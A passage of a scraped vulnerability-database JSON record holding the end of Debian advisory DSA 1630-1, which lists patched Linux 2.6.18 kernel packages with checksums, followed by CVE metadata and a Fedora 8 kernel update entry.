\r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-r5k-cobalt_2.6.18.dfsg.1-22etch2_mipsel.deb\r\n Size/MD5 checksum: 179462 e5497abf20a5461319d8f1d7c37d19b3\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-sb1-bcm91250a_2.6.18.dfsg.1-22etch2_mipsel.deb\r\n Size/MD5 checksum: 15057484 ea8ab2c273fbc3d282d0120cdbbe5c34\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all-mipsel_2.6.18.dfsg.1-22etch2_mipsel.deb\r\n Size/MD5 checksum: 55208 f3bfa65fa08c4ad552aef1536bdd1fcc\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-r4k-kn04_2.6.18.dfsg.1-22etch2_mipsel.deb\r\n Size/MD5 checksum: 5928064 cad7b6b3653d205a39e876a508d4ddaf\r\n\r\npowerpc architecture (PowerPC)\r\n\r\n http://security.debian.org/pool/updates/main/f/fai-kernels/fai-kernels_1.17+etch.22etch2_powerpc.deb\r\n Size/MD5 checksum: 3367890 ad1ad713d488f9e0e0669e1293f1ccd3\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-powerpc64_2.6.18.dfsg.1-22etch2_powerpc.deb\r\n Size/MD5 checksum: 254026 ae831a11ed61a4b52bb7a3043eb2f265\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-powerpc_2.6.18.dfsg.1-22etch2_powerpc.deb\r\n Size/MD5 checksum: 16628466 1b10ecc3a4095b9f0e9cd6fa0c544308\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver_2.6.18.dfsg.1-22etch2_powerpc.deb\r\n Size/MD5 checksum: 3415704 ea230f1f09a4e8341e7bb24ebd037dd3\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-powerpc-miboot_2.6.18.dfsg.1-22etch2_powerpc.deb\r\n Size/MD5 checksum: 15160062 e41656dd2782d44ec9487138dc694722\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-vserver-powerpc_2.6.18.dfsg.1-22etch2_powerpc.deb\r\n Size/MD5 checksum: 17017000 04153c3611b94ae5044868407f1eaa96\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver-powerpc64_2.6.18.dfsg.1-22etch2_powerpc.deb\r\n Size/MD5 checksum: 255324 60960ac1262f6d8eabcd96d9789b27bc\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-powerpc-smp_2.6.18.dfsg.1-22etch2_powerpc.deb\r\n Size/MD5 checksum: 253678 e1a1fcc0865698fca0aa46cc02c0e38d\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-powerpc64_2.6.18.dfsg.1-22etch2_powerpc.deb\r\n Size/MD5 checksum: 18295838 01cb70246fc9027dc9097964d0a7c06d\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver-powerpc_2.6.18.dfsg.1-22etch2_powerpc.deb\r\n Size/MD5 checksum: 253858 a30720b97122274208888b564c0548b5\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-vserver-powerpc64_2.6.18.dfsg.1-22etch2_powerpc.deb\r\n Size/MD5 checksum: 18354880 c82075e19802e915551cd25b04f72c76\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6_2.6.18.dfsg.1-22etch2_powerpc.deb\r\n Size/MD5 checksum: 3393390 246ebdc0ce319ab1b8c0022b1b69fd1d\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-prep_2.6.18.dfsg.1-22etch2_powerpc.deb\r\n Size/MD5 checksum: 246546 855a95e124dcd81d26d06fced8ff9cda\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-prep_2.6.18.dfsg.1-22etch2_powerpc.deb\r\n Size/MD5 checksum: 16406142 59c2543679159905e0d16445d7f5b66d\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-powerpc-miboot_2.6.18.dfsg.1-22etch2_powerpc.deb\r\n Size/MD5 checksum: 231148 96bb009cbc3c1c9fc00a4f84a4aa9cd5\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all_2.6.18.dfsg.1-22etch2_powerpc.deb\r\n Size/MD5 checksum: 55156 94c052eb19ce469aabc0a9a71860f861\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-powerpc-smp_2.6.18.dfsg.1-22etch2_powerpc.deb\r\n Size/MD5 checksum: 16971942 c230eb342210e9f9376783e013216695\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-powerpc_2.6.18.dfsg.1-22etch2_powerpc.deb\r\n Size/MD5 checksum: 252866 4b2bf2f6783bb456b5c003df3e1ea1f5\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all-powerpc_2.6.18.dfsg.1-22etch2_powerpc.deb\r\n Size/MD5 checksum: 55206 209887bf65d555135cde2cb7b1ef0b7b\r\n\r\ns390 architecture (IBM S/390)\r\n\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all-s390_2.6.18.dfsg.1-22etch2_s390.deb\r\n Size/MD5 checksum: 55168 ba80b3fe0aa1ffdc92825578c4a0a8e2\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-s390x_2.6.18.dfsg.1-22etch2_s390.deb\r\n Size/MD5 checksum: 5620988 555c4bd0a4b245f267dc324c9b39d695\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-s390_2.6.18.dfsg.1-22etch2_s390.deb\r\n Size/MD5 checksum: 144604 bd539fa6955b9ea80a38046b1097ea6e\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver-s390x_2.6.18.dfsg.1-22etch2_s390.deb\r\n Size/MD5 checksum: 145888 80f3dcbc19b2076e6a37ac8f48f1c687\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-s390_2.6.18.dfsg.1-22etch2_s390.deb\r\n Size/MD5 checksum: 5403802 9bfc6e49de7faecc3ae013efd8a5ff85\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6_2.6.18.dfsg.1-22etch2_s390.deb\r\n Size/MD5 checksum: 2944158 7a37040db97a3a43817eea570ca29554\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-vserver-s390x_2.6.18.dfsg.1-22etch2_s390.deb\r\n Size/MD5 checksum: 5663004 f3b7384004cd0c0c6a0478865300b9f8\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all_2.6.18.dfsg.1-22etch2_s390.deb\r\n Size/MD5 checksum: 55146 fd4df49a7d2116c1b1eb0f38211c196c\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-s390x_2.6.18.dfsg.1-22etch2_s390.deb\r\n Size/MD5 checksum: 145096 7e0bfcc155246d4b7cb8ee00d9a370ba\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-s390-tape_2.6.18.dfsg.1-22etch2_s390.deb\r\n Size/MD5 checksum: 1440072 437e3a46bda63f1ba5bb2d0b970a669f\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver_2.6.18.dfsg.1-22etch2_s390.deb\r\n Size/MD5 checksum: 2967228 a32e5147c0f741a5300c6122aade4377\r\n\r\nsparc architecture (Sun SPARC/UltraSPARC)\r\n\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-sparc64_2.6.18.dfsg.1-22etch2_sparc.deb\r\n Size/MD5 checksum: 10394174 30c3164de023288678eda955e7088e89\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-sparc32_2.6.18.dfsg.1-22etch2_sparc.deb\r\n Size/MD5 checksum: 166138 da9c686e82839dbecfc4d2f8d5d6ff8f\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-sparc32_2.6.18.dfsg.1-22etch2_sparc.deb\r\n Size/MD5 checksum: 6412488 738092d091284463d88dcce9bc0d683e\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-vserver-sparc64_2.6.18.dfsg.1-22etch2_sparc.deb\r\n Size/MD5 checksum: 10694332 aa5d657822ad30eb7edf2eca35644e09\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-sparc64-smp_2.6.18.dfsg.1-22etch2_sparc.deb\r\n Size/MD5 checksum: 196630 b349a6dd56888b772577075f21229498\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-sparc64_2.6.18.dfsg.1-22etch2_sparc.deb\r\n Size/MD5 checksum: 195534 c7b2e3ee30ba33f0a207fa11a5f08916\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver-sparc64_2.6.18.dfsg.1-22etch2_sparc.deb\r\n Size/MD5 checksum: 197330 5e9f1ad14b5b10c6012b09dcfa93acb5\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-sparc64-smp_2.6.18.dfsg.1-22etch2_sparc.deb\r\n Size/MD5 checksum: 10647804 5bab66c5cdaa22683425b4e101fea4e0\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all_2.6.18.dfsg.1-22etch2_sparc.deb\r\n Size/MD5 checksum: 55156 da09f09d5c47ce3cd8666b7ba98b9a08\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver_2.6.18.dfsg.1-22etch2_sparc.deb\r\n Size/MD5 checksum: 3191596 f6aee8879affc350feb8706cdffb95da\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6_2.6.18.dfsg.1-22etch2_sparc.deb\r\n Size/MD5 checksum: 3169298 a6ad7bd3b6ba9d573f47c21f45b9f660\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all-sparc_2.6.18.dfsg.1-22etch2_sparc.deb\r\n Size/MD5 checksum: 55184 322a273cbddb53db9fdb143229104384\r\n\r\n These changes will probably be included in the stable distribution on\r\n its next update.\r\n\r\n- ---------------------------------------------------------------------------------\r\nFor apt-get: deb http://security.debian.org/ stable/updates main\r\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\r\nMailing list: debian-security-announce@lists.debian.org\r\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.9 (GNU/Linux)\r\n\r\niD8DBQFIrZh4huANDBmkLRkRAskxAJ9J3UrvqPqj2rhy3PIXIfPUcWu8ggCggi+J\r\n3axwz1azO0SgmGCRip6WKHQ=\r\n=x8fB\r\n-----END PGP SIGNATURE-----", "edition": 1, "modified": "2008-08-21T00:00:00", "published": "2008-08-21T00:00:00", "id": "SECURITYVULNS:DOC:20387", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20387", "title": "[SECURITY] [DSA 1630-1] New Linux 2.6.18 packages fix several vulnerabilities", "type": "securityvulns", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:30", "bulletinFamily": "software", "cvelist": ["CVE-2008-3272", "CVE-2007-6282", "CVE-2008-2826", "CVE-2008-0598", "CVE-2008-2729", "CVE-2008-2931", "CVE-2008-3275", "CVE-2008-2812"], "description": "IPSec ESP pacjet parsing DoS, multiple local DoS conditions, kernel memory data leak, privilege escalation.", "edition": 1, "modified": "2008-08-21T00:00:00", "published": "2008-08-21T00:00:00", "id": "SECURITYVULNS:VULN:9235", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:9235", "title": "Linux kernel multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "fedora": [{"lastseen": "2020-12-21T08:17:49", "bulletinFamily": "unix", "cvelist": ["CVE-2007-5938", "CVE-2008-0600", "CVE-2008-1673"], "description": "The kernel package contains the Linux kernel (vmlinuz), the core of any Linux operating system. The kernel handles the basic functions of the operating system: memory allocation, process allocation, device input and output, etc. ", "modified": "2008-06-20T19:05:23", "published": "2008-06-20T19:05:23", "id": "FEDORA:M5KJ4HAM015709", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 8 Update: kernel-2.6.25.6-27.fc8", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}